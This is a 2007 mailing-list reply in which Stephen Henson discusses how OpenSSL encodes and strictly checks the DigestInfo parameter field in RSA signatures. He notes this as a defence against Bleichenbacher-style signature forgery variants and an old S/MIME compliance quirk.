Re: AlgorithmIdentifier, SHA-1, etc.

[Dr Stephen Henson <lists@xxxxxxxxxxxxxxxxxxxxxxxxxxx>]

Eric Rescorla wrote:
> At Sat, 07 Apr 2007 12:39:07 +0100,
> Dr Stephen Henson wrote:
>>
>> Russ Housley wrote:
>>> Note that the DigestInfoValue is part of the structure that is
>>> "encrypted" with the RSA private key when generating a signature.  It is
>>> recovered by "decrypting" the signature value with the RSA public key.
>>>
>> Note that care should be taken when handling the DigestInfo structure
>> recovered from an RSA signature.
>>
>> As well as the original Bleichenbacher signature forgery attack (caused
>> by ignoring trailing garbage after DigestInfo) there is a variant which
>> inserts garbage in the middle of the recovered structure. Allowing
>> arbitrary parameter values in the DigestAlgorithmIdentifier (for example
>> large OCTET STRINGs) is one way to do this. Unlike the original attack
>> this variant produces a "valid" DigestInfo structure.
>>
>> As a result in the specific case of the recovered DigestInfo from an RSA
>> signature OpenSSL now only tolerates a NULL or absent parameter field.
>> This is OK for all existing digests.
>>
>> It is more liberal about DigestInfo structures in other contexts.
> 
> Steven,
> 
> As I recall OpenSSL puts the NULL in the digestAlgorithm encoding
> as well. Am I right about that? 
> 
> 

Yes. It places the NULL in the DigestAlgortihmIdentifier for RSA
signatures DigestInfo according to PKCS#1.

It also includes it in other DigestAlgorithmIdentifier structures too.

As I recall (I'd have to check some ancient email archives) the NULL was
needed to pass an old S/MIME v2 compliance test some years back.

Steve.